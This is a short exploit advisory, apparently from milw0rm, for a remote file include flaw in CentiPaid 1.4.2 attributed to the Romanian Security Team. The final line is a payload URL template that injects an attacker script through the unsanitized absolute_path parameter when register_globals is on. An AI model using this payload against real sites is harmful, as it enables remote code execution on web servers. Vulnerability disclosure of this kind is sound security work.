[RST] CentiPaid <= 1.4.2 [absolute_path] RFI

[Guest Nemessis]

http://www.milw0rm.com/exploits/2555

---------------------------------------------------------------------------

CentiPaid <= 1.4.2 [absolute_path] Remote File Include Vulnerability

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : CentiPaid

version : 1.4.2

URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.2.tar.gz

------------------------------------------------------------------

Exploit:

~~~~~~~~

Variable $absolute_path not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/centipaid_class.php?absolute_path=[Evil_Script]